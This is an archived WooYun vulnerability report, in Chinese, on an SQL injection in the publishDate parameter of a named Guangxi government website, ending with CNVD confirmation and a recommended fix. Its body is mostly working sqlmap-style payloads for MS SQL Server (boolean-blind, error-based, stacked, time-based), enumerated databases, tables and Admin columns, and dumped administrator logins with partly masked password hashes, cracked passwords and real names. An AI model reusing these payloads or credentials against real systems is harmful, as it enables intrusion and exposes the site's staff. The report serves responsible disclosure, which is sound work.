乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-27: 细节已通知厂商并且等待厂商处理中 2014-07-31: 厂商已经确认,细节仅向厂商公开 2014-08-10: 细节向核心白帽子及相关领域专家公开 2014-08-20: 细节向普通白帽子公开 2014-08-30: 细节向实习白帽子公开 2014-09-10: 细节向公众公开
网页代码开发问题,存在SQL注入漏洞,通过SQL拼接送入数据库中执行,可获取管理员数据与执行系统命令。
存在漏洞URL:http://www.gxgxw.gov.cn/CommonPage/ArticleSearchResults.aspx?publishDate=2014-07-01存在漏洞参数:publishDate方式:get
Place: GETParameter: publishDate Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: publishDate=2014-05-30' AND 6919=6919 AND 'Ogma'='Ogma Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: publishDate=2014-05-30' AND 8263=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(97)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (8263=8263) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(101)+CHAR(113))) AND 'DTVG'='DTVG Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: publishDate=2014-05-30'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: publishDate=2014-05-30' WAITFOR DELAY '0:0:5'--
库:
available databases [6]:[*] db_gxw_ycfx[*] gxjw[*] master[*] model[*] msdb[*] tempdb
gxjw的表:
Database: gxjw[24 tables]+---------------------+| Admin || Article || ArticleClass || Department || Documents || EmailOfLeaders || GraphicInfo || GraphicType || Photos || Projects || PublicApplication || Questions || Roles || SpecialArticleClass || SugarPrice || Suggestions || Topic || UserGroup || Users || View_Admin || View_Article || View_GraphInfo || View_SpecialArticle || VisitsAndLetters |+---------------------+
Admin字段:
Database: gxjwTable: Admin[18 columns]+----------------+------+| Column | Type |+----------------+------+| adminId | int || deptId | int || email | char || homeAddress | char || isChecked | bit || lastLoginIP | char || lastLoginTime | char || lastLogoutTime | char || loginName | char || loginTimes | int || mobilePhone | char || officeAddress | char || officePhone | char || password | char || peoples | char || realName | char || roleId | int || sex | char |+----------------+------+
数据(原始数据、译开密码、人名后两位加星):
2|admin|5cab8c4d17760e2a35ee65bf943082** (gxgxwxx**)|管理员|9|qjlqjl|2ad3c409a73b80830b426d788ae85d** (qjl4**)秦**|14|pubing|a82d226bac54db82dadf8049ab68ef** (28030**)|蒲*|16|xtnxing|93bd21d8b2482913e35399b55d560a** |夏**|17|shaoguofu|aa405869b29ca387bc7ff7615c78d4** |邵**|18|tangzh |b29ccde3db588ff10ff5e93c3b3f15** ( simplelo** )|唐*|19|laochzhi|25f9e794323b453885f5181f1b624d** ( 1234567** )|劳**|21|test002|351523b8e6eb36ae5115205886f36f** ( test0** )|李**|
检查网站注入漏洞,检查网站执行系统命令痕迹。
危害等级:高
漏洞Rank:11
确认时间:2014-07-31 21:56
CNVD确认并复现所述情况,已经转由CNCERT下发给广西分中心,由其后续协调网站管理单位处置。
暂无